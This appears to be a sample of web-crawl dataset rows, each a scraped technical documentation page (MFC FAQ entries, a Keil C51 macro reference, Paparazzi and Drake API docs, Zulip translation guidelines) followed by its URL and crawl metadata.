You'd better use one of the built-in synchronization methods. See Q124134 : Allowing Only One Application Instance on Win32s for a sample of using a memory mapped file for synchronization. It doesn't include starting the previous instance, but if you detect that you're not the only one running, it should be pretty simple: if CreateFileMapping fails, try to find the previous instance from the window class name. If it's not found, sleep for a while and start over (with CreateFileMapping). In this way, either you will find the other instance when it gets around to creating it's window or CreateFileMapping will eventually succeed. The advantage of using CreateFileMapping instead of CreateObject is that it also works on Win32s.
Note: There's a sample of this that was contributed by [email protected] (John Xu) called onetime4.zip that is in the MFC FAQ archive (see section 2.2.6 for MFC FAQ archive details).
13.2.3. How do I get my MFC app to use the Registry on Win32 platforms?
Just make a call to SetRegistryKey("MyCompany") in your CWinApp class and pass it a string (typically your company name). This string will define where in the registry the data goes: HKEY_CURRENT_USER\Software\MyCompany\\\
After making this call just use the normal WriteProfilexxx() routines and the data will go to the registry instead of to an INI file. It works well and is simple!
Brett Robichaud, [email protected], 6/23/95, programmer.win32
13.2.4. How do I programmatically terminate my MFC application?
MFC does not provide a public function to gracefully exit an application. A method for dealing with this is to create a function in your application like the following:
- void ExitApp()
- {
- // same as double-clicking on main window close box
- ASSERT(AfxGetApp()->m_pMainWnd != NULL);
- AfxGetApp()->m_pMainWnd->SendMessage(WM_CLOSE);
- }
As you can see, this is implemented as a global function, which can be called from anywhere in your application. It simply sends a WM_CLOSE message to your application's mainframe window. This initiates an orderly shutdown of the application.
If you are using MFC, version 2.5 or later, you can take advantage of a new global MFC function, "AfxGetMainWnd", to simplify the code:
- void ExitMFCApp()
- {
- // same as double-clicking on main window close box
- ASSERT(AfxGetMainWnd() != NULL);
- AfxGetMainWnd()->SendMessage(WM_CLOSE);
- }
NOTE: Always call CDocument::SetModifiedFlag() after changing your document data. This will ensure that the framework prompts the user to save before shutdown. If you need more extensive control over the shutdown procedure, you can override CDocument::SaveModified().
MS FAQ, 6/25/95 | https://documentation.help/MFC/chapter13_2.htm | CC-MAIN-2020-40 | en | refinedweb |
Technical Support
On-Line Manuals
Cx51 User's Guide
The FCVAR macro accesses absolute memory addresses in the
const far memory area (the HCONST memory class). You may use
this macro in your programs as follows:
#include <absacc.h> /* Include Macro Definitions */
.
.
.
var = FCVAR (int, 0x24002) /* read int from HCONST address 0x24002 */
.
.
.. | https://www.keil.com/support/man/docs/c51/c51_fcvar.htm | CC-MAIN-2020-40 | en | refinedweb |
#include "std.h"
#include "baro_board.h"
#include "subsystems/sensors/baro.h"
#include "peripherals/ads1114.h"
#include "subsystems/abi.h"
#include "led.h"
Go to the source code of this file.
Definition at line 37 of file baro_board.c.
Referenced by baro_periodic(), and umarim_baro_event().
Definition at line 46 of file baro_board.c.
Referenced by baro_init().
Definition at line 42 of file baro_board.c.
Referenced by umarim_baro_event().
Definition at line 49 of file baro_board.c.
References ads1114_init(), apogee_baro, BARO_STARTUP_COUNTER, LED_OFF, MPL3115_I2C_ADDR, mpl3115_init(), and startup_cnt.
Definition at line 58 of file baro_board.c.
References ads1114_read(), apogee_baro, BARO_ABS_ADS, Mpu60x0_I2c::config, Mpl3115::data_available, imu_apogee, Mpu60x0Config::initialized, LED_ON, LED_TOGGLE, mpl3115_periodic(), MPL_PRESCALER, ImuApogee::mpu, and startup_cnt.
Definition at line 75 of file baro_board.c.
References Ads1114Event, Ads1114GetValue, BARO_ABS_ADS, BARO_BOARD_SENDER_ID, startup_cnt, and UMARIM_BARO_SENS.
Definition at line 47 of file baro_board.c. | http://docs.paparazziuav.org/v5.14/umarim_2baro__board_8c.html | CC-MAIN-2020-24 | en | refinedweb |
Ske of skewness has applications in data analytics, machine learning and data science in per-processing of data. Moreover, if mean, median and mode of a data distribution coincides i.e mean = median = mode then. Then data set has skewness 0 i.e there is no asymmetry in data set.
Suppose a data set
0,10, 20,20, 30, 40,40,50,50, 50,50,40,30,20,10,0
Mean: 28.75
Median: 30.0
Mode: 50
Standard Deviation: 17.275343701356565
Skewness : -0.24321198774750508
The value of coef. of skewness is negative and this type of skewness in data distribution is called negative skewness.
Formula of skewness
Coef. of Skewness = 3(Mean-Median) /Standard Deviation
The statistics are calculated using the following python code
Python Code for Calculating Coefficient of Skewness
from scipy.stats import skew import numpy as np import statistics import matplotlib.pyplot as plt x = [0,10, 20,20, 30, 40,40,50,50, 50,50,40,30,20,10,0] print(x) mean= np.mean(x) median= np.median(x) mode= statistics.mode(x) std=np.std(x) print("Mean:", mean) print("Median:", median) print("Mode:", mode) print("Standard Deviation:", std) lines = plt.plot(x) plt.setp(lines, color='r', linewidth=2.0) print( "Skewness :" , skew(x)) plt.savefig("skewness.jpg")
Consider another data set
0,10, 20, 30,40,50,50,50,60,60,70,80,90,100,110,120,70,60,60, 50,50,50,40,30,20,10,0
Mean: 51.111111111111114
Median: 50.0
Mode: 50
Standard Deviation: 30.83208205669246
Skewness : 0.32780083058284104
The value of coef. of skewness is positive and this type of skewness in data distribution is called positive skewness.
Kurtosis-
Kurtosis measures “How much heavy tail a data distribution have”. Furthermore, it is used for outlier detection in a data set
that means how many values have different characteristics.
The formula for kurtosis is
Coef. Kurtosis =(X-μ)4/Variance
Python code for Kurtosis
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats as stats
import math
from scipy.stats import kurtosis
mu = 0
variance = 1
sigma = math.sqrt(variance)
x = np.linspace(mu – 5*sigma, mu + 5*sigma, 50)
y1=stats.norm.pdf(x, mu, sigma)
print(“x”,x)
print(“y1”,y1)
plt.plot(x,y1)
print(“Kurtosis\n”, kurtosis(y1))
plt.savefig(“kurtosis.jpg”)
The normally distributed data set generated from the above python code is
1.48671951e-06 4.03963981e-06 1.05285406e-05 2.63211976e-05
6.31182642e-05 1.45183206e-04 3.20324125e-04 6.77914385e-04
1.37616968e-03 2.67966838e-03 5.00497661e-03 8.96674844e-03
1.54091915e-02 2.54001718e-02 4.01610804e-02 6.09096432e-02
8.86091674e-02 1.23646888e-01 1.65500632e-01 2.12484892e-01
2.61678710e-01 3.09115411e-01 3.50255414e-01 3.80680815e-01
3.96870719e-01 3.96870719e-01 3.80680815e-01 3.50255414e-01
3.09115411e-01 2.61678710e-01 2.12484892e-01 1.65500632e-01
1.23646888e-01 8.86091674e-02 6.09096432e-02 4.01610804e-02
2.54001718e-02 1.54091915e-02 8.96674844e-03 5.00497661e-03
2.67966838e-03 1.37616968e-03 6.77914385e-04 3.20324125e-04
1.45183206e-04 6.31182642e-05 2.63211976e-05 1.05285406e-05
4.03963981e-06 1.48671951e-06
Pot of data is
And kurtosis is -0.24249670483561347
Conclusion-
I this post, I have explained about skewness and kurtosis which is very important to understand data distribution. These both data analytics method are very important in machine learning, data science and big data analytics. Hope all these concepts I have explained will help you. | https://www.postnetwork.co/skewness-and-kurtosis/ | CC-MAIN-2020-24 | en | refinedweb |
GREPPER
SEARCH
WRITEUPS
DOCS
INSTALL GREPPER
All Languages
>>
PHP
>>
create file in laravel
“create file in laravel” Code Answer’s
create file in laravel
php by
Indian Gooner
on May 10 2021
Comment
2
namespace App\Http\Controllers; use File; class FileController extends Controller { public function downloadJSONFile(){ $data = json_encode(['Element 1','Element 2','Element 3','Element 4','Element 5']); $file = time() .rand(). '_file.json'; $destinationPath=public_path()."/upload/"; if (!is_dir($destinationPath)) { mkdir($destinationPath,0777,true); } File::put($destinationPath.$file,$data); return response()->download($destinationPath.$file); } }
Source:
laravel store file
php by
Faithful Fox
on Dec 05 2020
Comment
0
$path = $request->file('avatar')->store( 'avatars', 'public' );
Source:
stackoverflow.com
Add a Grepper Answer
Answers related to “create file in laravel”
laravel file upload
upload file laravel
laravel filesystem
laravel get file name
laravel file store
how to save information on pdf file in laravel project
store file into specific directory laravel using storage facade
laravel file uploads
how to include file in laravel blade
write to file laravel
laravel storage save file folder on disk
laravel read file from tmp
laravel get file to browser send
laravel store file specifiying name and disk
store as real file name laravel uplaod
laravel file custom name
laravel create new file if not exists
create file in directory php
laravel include files
laravel save file or picture directory
read file in maatwebsite in laravel
Queries related to “create file in laravel”
laravel storage
upload file laravel
file upload in laravel
file storage laravel
laravel save file
laravel storage put
store file in storage laravel
laravel save file to storage
laravel create file
get file laravel
link storage in laravel
laravel storage file exists
laravel storage folder
file in laravel
create file in laravel
laravel write file
laravel create text file
create file laravel
laravel storage upload file
save file in storage laravel
how to create file in laravel
laravel file uploads
use file laravel
how to save file in laravel
store laravel
laravel upload file to storage folder
write text file in laravel
store in laravel
laravel store files from request
save files in laravel
storage overwrite laravel
write to file laravel
laravel create new file
laravel where to store files
laravel get file path storage
laravel store file in database
laravel list file from server
storage laravel single image
laravel move file
laravel create a file
save file in laravel 8
laravel file->store
laravel make file
save to file laravel
laravel file store as
laravel store in folder
laravel storage make directory
laravel request file store public
laravel storage get path to file on disk
how does store in laravel create filename
laravel storage::put file
laravel put file as
local storage laravel 8
how to reference uploaded files to user laravel
how to setup a download laravel file into lacal host
store file in laravel storage
Storage laravel copy file
Storage create a path laravel
upload folder in laravel
laravel custom folder in storage path
how to make file management project in laravel
how to move file tmp folder to public folder in laravel
laravel file copy from c drive
laravel create dir local stoage
write to a file in laravel
store files laravel
storing file in laravel 8
file->store laravel
laravel save files
how to create text file in laravel
laravel write to text file
laravel files in directory
how to store img in laravel
how to create text file from laravel controller
laravel file copy from drive
laravel file saveas
laravel namespace Storage
laravel method to store file in database
laravel folder upload
laravel file store vs save
laravel putas
laravel request->file store disk
laravel files get uploaded by user
laravel file upload temporary
laravel save file on store
store a file laravel
Storage::disk('public')->path($directory).$filename
storage write laravel
store file laravel 9
show files of laravel storage
save file path laravel
save a uploaded file into a folder in laravel
store file laravel and specify name
write file on disk laravel
where should i store files laravel
when download photo image file extension not suppport from server in laravel
upload file from url laravel
upload and save file in laravel
storing file laravel 5.2
store storage in laravel
read file in folder laravel in storage folder
laravel storage putFileAs
laravel store file from url
laravel store and move
laravel storage storeas
laravel storage move file
laravel storage copy file
Laravel specify where in the project files to store uploaded images
laravel server path access
php artisan strorage link
open files fromftp laravel
make new file system adapter laravel
link storage to laravel
laravel working with files
laravel upload image to root production
laravel update files
laravel store uploaded files
laravel diskname as private
datale all files in laravel
asset from storage laravel
check if $file->move finish laravel
copy from local storage to disk laravel
create storage path public
write file with laravel
file create file laravel php File facade
file()->store() in laravel
filer in laravel
get file from api and store laravel
write text file laravel
laravel default filesystem content
how to use file in laravel
laravel create text file and write to it
laravel make text file
laravel save text to txt
laravel write text file
how read text file in laravel 8
make file and write to it in laravel
generate txt file php laravel
put file laravel
save data in txt file laravel
how to create a file object in laravel to store file path and content and name for api response purpose
how to store file in laravel 9
create a file laravel
in store function laravel update the file name
laravel $file->storeAs
how to store a file in laravel 8
laravel 8 store file in laravel 8
laravel allFiles
laravel create and store file
laravel custom image storage
laravel create file and write
how to give path of a file in laravel
create file from controller laravel
how to point the storage public folder in laravel?
how to create file in laravel 7
how to create file laravel
how to create file extions php in laravel
how to create a txt file laravel with blade data
how to create a file system laravel
storing the file in laravel
how to create a file in laravel 7
how to create txt file in laravel
laravel 8 create a file
how to write txt in laravel
how to write on a text file in laravel
temporare store file in laravel
how to create text file in laravel with write
how to read and write text file in laravel
how to make file in laravel
how to import text file data in laravel 7
how to create a file in laravel
create file field laravel
file create laravel
echo in a text into a txt file php laravel
create txt file in laravel 7
store files on laravel
storing file in laravel
laravel 9 create text file from database
create file and put content in laravel 8
file write laravel
how create file in laravel
create file in laravel code
store file in my app laravel
store file larave
generate file in laravel
store file laravel from requuest
generate custom file from laravel
store files in laravel8
laravel write in text file
laravel mass file store
file()->store laravel
file storeas laravel
$file->storeAs LARAVEL
how to display the file which u store it in laravel
write data to text file laravel
work with txt file in laravel
store text file laravel
save data in txt file in laravel
laravel store as get file
converting content into file txt laravel
laravel file store with path in db
larave store file
how to upload documents in laravel
how to get laravel files
how to store any file in laravel
laravel file_store
laravel get and set store file
laravel how to store value in file
laravel create a file with formatting
laravel how to write a file
laravel generate file
laravel export txt file
laravel create txt
laravel save txt file
laravel create text file and read from it
laravel create file.php code
php file upload on laravel
laravel create file from content
laravel store data in file
laravel store fil;e
php laravel create txt file
output text to file php laravel
laravel store file in storeAs
laravel storeAs write text to a new txt file
laravel write txt
laravel write to textfile
laravel write file text
laravel text file
laravel file upload
file upload laravel
laravel store file
laravel store image
laravel upload file to storage
laravel file store
store file laravel
laravel storage get file path
store file in laravel
laravel 8 upload file
laravel store file in storage
laravel file system
local storage laravel
upload file to s3 in laravel
laravel storage file
storeas laravel
upload laravel
php artisan storage
storage disk put laravel
save file in laravel
file store laravel
file laravel
laravel store
laravel storage get file type
upload data in private path laravel
laravel 8 storage link
storage facade laravel
store file laravel 8
create file laravel storage
laravel Storage::put
file system laravel
file storage laravel example
laravel disk
create text file laravel
laravel get file storage path
laravel file store in public folder
file save in laravel
laravel store file name
laravel save file in storage
create file with laravel
laravel storage file get
laravel store file from request
create files laravel
laravel file uplod
laravel 8 store file
laravel append file
driver parameter in disk laravel
attach a file in laravel
filesystem csv file in storage using laravel
write file laravel
save files laravel
How can I save file from api response Laravel public directory
create new file laravel
upload file in laravel using storage
how to upload folders in laravel
store file with name in laravel
laravel file store from disk
laravel File::make
laravel File::files
laravel storeAs file
laravel use local storage
load file larvel
laravel create dir stoage ph
store doc format in laravel
$file->store laravel
laravel storage download file to server
laravel storage default disk
create text file in laravel
where is the route for pdf storage in laravel app
how to create new file in laravel
new file laravel
save file laravel 8
laravel store a file
laravel write to rxt file
laravel folder within storage
laravel file disk
laravel file systems
laravel many symbolic link storage
laravel file storage issue in linux server
laravel filesystem route path
laravel retrieving file
laravel file system extension
laravel read storage files
laravel load file name for from
storage server file check in laravel
store file from a link laravel
Storage::disk put
storage server file check in laravel other server
storage laravel copy file ftp
show file laravle
Save File On Storage in Larvel
remove file from remote server in laravel
public vs local disk laravel
whitch is the best way for store uploaded files models laravel
where is the store function into laravel files
what if file class files return value in laravel?
store file using laravel storage
text and files management laravel dashboard
storeas parameters laravel
store image in laravel with name using storage:put function
private or public store laravel
laravel store file in folder
Laravel store file from form
laravel Storage::putFile example
laravel storage publish
laravel storage get url to file
laravel storage close
laravel show file location
laravel store file in new folder
laravel write to file in storage
open files from ftp laravel
larvel file store
laravel store file with disk
laravel upload folder
laravel temp file
laravel store fuile
Writing text in a file ready files via the controller laravel Storage::disk
$file- store laravel
best way to store files in laravel 9
check if disk put files laravel
create a folder and file in storage laravel
database path storage laravel
file in laravel
file method in php laravel
File::move laravel
find the laravel store function into files
get information about storage disk laravel
File maker with laravel
how to write on a .txt file in laravel
how to store the file in laravel
laravel create txt file
laravel read text file
laravel set file
save file as laravel
make a file in laravel
make file in laravel
php laravel save file
read text file in laravel
how read external file laravel
laravel 7 file directpry
create a txt file laravel 8
create a file in laravel with name
laraavel link storage
laravel 6 $file->store
create a file and save data laravel
laravel 8 store in storage
laravel autocreate storage directories
laravel create php file with Fileesystem class
create a text file in laravel
how to make a copy file of resource folder in laravel
How to make the Laravel storage path from Absolute to relative using artisan and terminal
how to read a file in laravel
how to put file in to storage laravel
create laravel in this file
how to create file php in laravel
how to create a text file laravel
create project readme.txt file laravel
store file in laravel 8
create a file in larave and add text
store file in database laravel
how to create files in laravel from string
how write txt file in laravel
how to write txt file laravel
set default file laravel7 if no file uplaod
how to store a text file in laravel
how to read text file data in laravel
how to open text file in blade laravel
how to make a text file in laravel
how save in a text fil in laravel
where to store files laravel
create a file with laravel
file = new file in php laravel
store() larave; , store file name
create txt file in laravel
create a text file in laravel
create txt file in laravel in php
create file command line laravel
create and write to a file using laravel
create text file php laravel
where we store files in laravel
where to store files in laravel
where to store file on laravel
generate file laravel
generate a file with artisan in laravel
create text file in php laravel
File::make laravel
store files laraevl
laravel code using create file
laravel override server file and save another file
file storer in laravel
file store laravel on disk
$file->storeAs in laravel
write in files laravel
write a text file in laravel
work txt file in laravel
store a text file laravel
how to create to retrieve your own upload in laravel
how to store files in laravel 8
laravel file store filename
laravel file store()
how to upload laravel
how to upload a sample storage file into laravel and link it to download from the laravel blade
how to store file in laravel temporarily
how to store a file using the fill in laravel 8
how to show store file in laravel 8
how to make store file in laravel 8
laravel store all files
laravel create text file and upate content
laravel get text from file
laravel write to file Storage
laravel download write to text file
laravel create text file and write
laravel create text file and store
laravel create text fiel
php artisan storing pdf
php laravel where to store files
laravel save text to file
make laravel file
read text file laravel
Laravel store file in dir
new file write and get content laravel
new file in laravel
laravel store file with store function
laravel store in file
laravel store plain php file
laravel write a file
command to create file in laravel
laravel upload file
laravel filesystem
laravel get file size
laravel 8 file upload
storage path in laravel
file storage in laravel
storage put laravel
laravel file
laravel 8 upload file to storage
laravel get file from storage folder
laravel local storage
upload files laravel
save file laravel
laravel storage facade
laravel upload files
how to store file in laravel
laravel storage file path
laravel storage get file name
use file in laravel
laravel store files
laravel write to file
laravel link public storage
laravel file storeAs
path to storage laravel
store file in laravel 8
file store in laravel
laravel storing images
file exists laravel storage
read file laravel
Laravel 8 store files
store image in laravel storage
laravel file save
laravel new File
create a file in laravel
laravel storage delete
Storage::disk in laravel
laravel 8 store file in public folder
upload to s3 laravel
get file from storage folder laravel
laravel Storage::disk('public')
laravel creating files
file storage laravel 7
laravel storage file list
how to store a file in laravel
laravel load file from public
laravel store file with name
document store in controller laravel
are files stored both in public and storage laravel
laravel store method for files
laravel read files
laravel put file to storage
filesystem.php laravel private
laravel file store with path
how to search file in filesystem laravel
storage upload laravel
laravel create file from controller
store laravel function
upload file laravel to server zithout losing connection
laravel. how to make a folder system from storage folder
how to get path of file in laravel
how to make instance of UploadedFile from server laravel
laravel file copy
laravel ftp storage go to dir
store file in storage laravel 8
laravel save file upload
laravel storage disk create directory
storing files in laravel
create file txt laravel
laravel file upkoad
how to read text file in laravel
laravel create file from string
how to store files in laravel
how to upload and save file laravel
laravel putfile disk
laravel path of file
laravel get file form url
laravel flysistem
laravel manage files
laravel file storage in specific directory
laravel filesystem local
laravel file update
laravel filesystem extension
laravel file store data
laravel store file in filesystem
store file in disk laravel
storage::list laravel
storage::allfiles demo in laravel
Storage putfileas
storage all files
save file to storage link folder laravel
save at storage laravel
store file in laravel storage and use it
uri files save in laravel
where the file is store in laravel
where does laravel save file
Using File System: laravel 7
upload directory in laravel
symbolic link laravel
store:: get file in laravel
store file with laravel
laravel server file read
laravel store file function
laravel store class
laravel storage without request
laravel store file php file upload
laravel storage disk ublic put
laravel storage check config is defined
laravel set file storage public
laravel store file resposne to another file
path to storage dile upload
open file in laravel
lkaravel 8 storage
laraverl store files
laravel using to file upload
laravel upload file to storage and can
laravel storing files file path
laravel store file with filename
laravel delete directory on download
$request->file('document_1')->store('public','documents') laravel
can laravel asset give access to files inside local disk in laravel
check if disk uploaded file laravel
create file in specific directory laravel
every download file set different storage location in php
file create file laravel php
file saveas laravel
File::put laravel
folders in file check file type laravel
give storage path in laravel
how to access files from controller laravel
laravel create text file and download
how to save data in text file with laravel
laravel Filefile
laravel save a file
laravel store text in text file
laravel write to txt file
make a text file in laravel
make file laravel
put file in laravel
save a file laravel
$files = Storage::allFiles($directory);
how to store file in laravel 8
how to store file using filesystem file in laravel
how to write a stream on local storage disk laravel
laravek file storeAS
laravel 8 full path to storage file
laravel 8 storage store file
laravel add file to filesystem upload
laravel copy file
laravel create store file path instead of filename
create and write file laravel
how to download a filestored in assets in laravel
create custom file laravel 8
how to make instance of UploadedFile exists in server laravel
how to create all files in laravel
create and write to file php laravel
create text file on server laravel
string store in file laravel
how to create a file with contents in laravel
store a file in laraavel
how to create a file system in laravel
create new file in laravel from string content
create text file and add data in that laravel
how tocreate a txt file and write to in laravel
how to write to a textfile in laravel
THE best place to store files in laravel
how to save and create file in laravel
upload and view files in storage laravle
how to make text file in laravel
write text file on disk laravel
how to create text files in laravel
storing files laravel
File laravel create file
echo whats in txt file laravel
creating file in laravel
storefile in laravel
storing a file laravel
create the txt file inside folder in laravel
create and save text file laravel
create a file in php laravel and put
generate file txt laravel
ho wto create new file in laravel
storing file laravel 8
generate files in php laravel
create a file in laravel;
store file laravel from request
store file on laravel
file->make laravel
store file laravel save
write to a file php laravel
get the store file in blade laravel
laravel save file to filesystem
laravel save string to file
write text to file laravel
write file txt laravel
write a file in laravel
text save in new file larvel
save text to file laravel
how to get file and store file in js and laravel
laravel dowsnt store file
laravel 7 store file
laravel file storege
laravel file upload put
how to store file laravel
how to store file in laravel 7
laravel filesystem upload file
how to save files in laravel
laravel get file upload size
read text file php laravel
laravel save text in file
laravel generate text file
laravel file create file
laravel data to txt
make a file an store in directory laravel
laravel create text file and save
laravel create text document
laravel create file with content
laravel create file in command
laravel upload a blender file
laravel store data to a file
laravel store file in
php artisan create file
new file php laravel
make file laravel code
laravel store files in db
laravel write to txt
laravel store string to file
laravel strore file
. | https://www.codegrepper.com/code-examples/php/create+file+in+laravel | CC-MAIN-2022-33 | en | refinedweb |
Parses SDF and URDF input files into a MultibodyPlant and (optionally) a SceneGraph.
For documentation of Drake-specific extensions and limitations, see Parsing Models for Multibody Dynamics.
When parsing literal quantities, Parser assumes SI units and radians in the absence of units specified by the format itself. This includes the literals in the explicitly specified files as well as referenced files such as OBJ or other data file formats.
#include <drake/multibody/parsing/parser.h>
Parses the SDF, URDF, or MJCF file named in
file_name and adds all of its model(s) to
plant.
SDFormat files may contain multiple
<model> elements. New model instances will be added to
plant for each
<model> tag in the file.
<model>s directly under
<sdf>, is deprecated. If you need multiple models in a single file, please use an SDFormat world file.
URDF files contain a single
<robot> element. Only a single model instance will be added to
plant.
MJCF (MuJoCo XML) files typically contain many bodies, they will all be added as a single model instance in the
plant.
Parses the SDFormat, URDF, or MJCF file named in
file_name and adds one top-level model to
plant.
It is an error to call this using an SDFormat file with more than one root-level
<model> element.
Provides same functionality as AddModelFromFile, but instead parses the SDFormat or URDF XML data via
file_contents with type dictated by
file_type.
Gets a mutable reference to the PackageMap used by this parser.
Gets a mutable reference to the plant that will be modified by this parser.
Cause all subsequent Add*Model*() operations to use strict parsing; warnings will be treated as errors. | https://drake.mit.edu/doxygen_cxx/classdrake_1_1multibody_1_1_parser.html | CC-MAIN-2022-33 | en | refinedweb |
Translation Guidelines¶
Zulip’s has full support for Unicode (and partial support for RTL languages), so you can use your preferred language everywhere in Zulip. We also translate the Zulip UI into more than a dozen major languages, including Spanish, German, Hindi, French, Chinese, Russian, and Japanese, and we’re always excited to add more. If you speak a language other than English, your help with translating Zulip is be greatly appreciated!
If you are interested in knowing about the technical end-to-end tooling and processes for tagging strings for translation and syncing translations in Zulip, read about Internationalization for Developers.
Translators’ workflow¶
These are the steps you should follow if you want to help translate Zulip:
Sign up for Transifex and ask to join the Zulip project on Transifex, requesting access to any languages you’d like to contribute to (or add new ones).
Join #translation in the Zulip development community server, and say hello. That stream is also the right place for any questions, updates on your progress, reporting problematic strings, etc.
Wait for a maintainer to approve your Transifex access; this usually takes less than a day. You should then be able to access Zulip’s dashboard in Transifex.
Translate the strings for your language in Transifex.
If possible, test your translations (details below).
Ask in Zulip for a maintainer to sync the strings from Transifex, merge them to master, and deploy the update to chat.zulip.org so you can verify them in action there.
<...>); just keep them verbatim.; if setting one up is a problem for you, ask in chat.zulip.org and we can usually just deploy the latest translations there.
First, download the updated resource files from Transifex using the
tools/i18n/sync-translationscommand (it will require some initial setup). This command will download the resource files from Transifex and replace your local resource files with them, and then compile them. You can now test your translation work in the Zulip UI.
There are a few ways to see your translations in the Zulip UI:
You can insert the language code as a URL prefix. For example, you can view the login page in German using. This works for any part of the Zulip UI, including portico (logged-out) pages.
For Zulip’s logged-in UI (i.e. the actual webapp), you can pick the language in the Zulip UI.
If your system has languages configured in your OS/browser, Zulip’s portico (logged-out) pages will automatically use your configured language. Note that we only tag for translation strings in pages that individual users need to use (e.g.
/register/, etc.), not marketing pages like
/features/.
In case you need to understand how the above interact, Zulip figures out the language the user requests in a browser using the following prioritization (mostly copied from the Django docs):
It looks for the language code as a url prefix (e.g.
/de/login/).
It looks for the
LANGUAGE_SESSION_KEYkey in the current user’s session (the Zulip language UI option ends up setting this).
It looks for the cookie named ‘django_language’. You can set a different name through the
LANGUAGE_COOKIE_NAMEsetting.
It looks for the
Accept-LanguageHTTP header in the HTTP request (this is how browsers tell Zulip about the OS/browser language).
Using an HTTP client library like
requests,
cURLor
urllib, you can pass the
Accept-Languageheader; here is some sample code to test
Accept-Languageheader using Python and
requests:
import requests headers = {"Accept-Language": "de"} response = requests.get("", headers=headers) print(response.content)
This can occassionally be useful for debugging.
Translation style guides¶
We maintain translation style guides for Zulip, giving guidance on how Zulip should be translated into specific languages (e.g. what word to translate words like “stream” to), with reasoning, so that future translators can understand and preserve those decisions:
Some translated languages don’t have these, but we highly encourage translators for new languages (or those updating a language) write a style guide as they work (see our docs on this documentation for how to submit your changes), since it’s easy to take notes as you translate, and doing so greatly increases the ability of future translators to update the translations in a consistent way.”
The Zulip test suite enforces these capitalization guidelines in the
webapp codebase in our test
suite
(
./tools/check-capitalization;
tools/lib/capitalization.py has
some exclude lists, e.g.
IGNORED_PHRASES). | https://zulip.readthedocs.io/en/latest/translating/translating.html | CC-MAIN-2019-47 | en | refinedweb |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.